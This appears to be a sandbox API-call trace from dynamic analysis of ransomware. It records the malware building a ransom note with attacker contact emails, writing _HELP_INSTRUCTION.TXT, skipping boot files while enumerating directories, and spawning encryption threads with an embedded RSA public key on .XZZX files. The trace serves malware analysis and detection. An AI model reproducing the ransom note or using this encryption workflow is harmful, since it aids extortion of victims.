hKey=0x119c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d41c8, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43d41c8*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0234.350] RegCloseKey (hKey=0x119c) returned 0x0 [0234.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0234.350] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0234.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x119c [0234.351] CloseHandle (hObject=0x119c) returned 1 [0234.351] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0234.351] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0234.351] lstrcpyW (in: lpString1=0x17a5a4, lpString2="IkpxUp8UshIgHl1" | out: lpString1="IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0234.351] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0234.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0234.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0234.351] SetErrorMode (uMode=0x1) returned 0x1 [0234.351] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0234.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.351] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*" [0234.351] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0234.352] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0234.352] lstrcpyW (in: lpString1=0x17a5a4, lpString2="ZW28zqHzfxAY2NV" | out: lpString1="ZW28zqHzfxAY2NV") returned="ZW28zqHzfxAY2NV" [0234.352] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0234.352] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="ntldr") returned 0x0 [0234.352] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="NTLDR") returned 0x0 [0234.352] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0234.352] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0234.352] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0234.352] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0234.352] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0234.352] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.352] lstrcpyW (in: lpString1=0x17addc, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0234.352] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11a4 [0234.352] Sleep (dwMilliseconds=0x96) [0234.504] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0234.504] lstrcmpW (lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpString2="..") returned 1 [0234.504] lstrcmpW (lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpString2=".") returned 1 [0234.504] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0234.504] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="ntldr") returned 0x0 [0234.505] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="NTLDR") returned 0x0 [0234.505] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0234.505] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="ntdetect.com") returned 0x0 [0234.505] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0234.505] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0234.505] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0234.505] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.505] lstrcpyW (in: lpString1=0x17addc, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0234.505] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11a8 [0234.505] WaitForSingleObject (hHandle=0x11a8, dwMilliseconds=0xffffffff) returned 0x0 [0234.506] Sleep (dwMilliseconds=0x96) [0234.660] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0234.660] lstrcmpW (lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpString2="..") returned 1 [0234.660] lstrcmpW (lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpString2=".") returned 1 [0234.660] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0234.660] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="ntldr") returned 0x0 [0234.660] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="NTLDR") returned 0x0 [0234.660] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0234.660] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0234.661] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0234.661] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0234.661] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0234.661] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.661] lstrcpyW (in: lpString1=0x17addc, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0234.661] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11ac [0234.661] Sleep (dwMilliseconds=0x96) [0234.816] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0234.816] lstrcmpW (lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX", lpString2="..") returned 1 [0234.816] lstrcmpW (lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX", lpString2=".") returned 1 [0234.816] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0234.816] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="ntldr") returned 0x0 [0234.816] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="NTLDR") returned 0x0 [0234.816] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0234.817] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="ntdetect.com") returned 0x0 [0234.817] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0234.817] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0234.817] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0234.817] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.817] lstrcpyW (in: lpString1=0x17addc, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0234.817] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11b0 [0234.817] Sleep (dwMilliseconds=0x96) [0234.972] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0234.972] lstrcmpW (lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpString2="..") returned 1 [0234.972] lstrcmpW (lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpString2=".") returned 1 [0234.973] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0234.973] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="ntldr") returned 0x0 [0234.973] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="NTLDR") returned 0x0 [0234.973] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0234.973] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0234.973] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0234.973] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0234.973] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0234.973] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.973] lstrcpyW (in: lpString1=0x17addc, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0234.973] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.973] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11b4 [0234.973] Sleep (dwMilliseconds=0x96) [0235.130] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0235.130] lstrcmpW (lpString1="73C0D9902A7964C0808D031B2E914908.XZZX", lpString2="..") returned 1 [0235.130] lstrcmpW (lpString1="73C0D9902A7964C0808D031B2E914908.XZZX", lpString2=".") returned 1 [0235.130] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0235.130] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="ntldr") returned 0x0 [0235.130] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="NTLDR") returned 0x0 [0235.130] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0235.130] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="ntdetect.com") returned 0x0 [0235.130] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0235.130] StrStrW 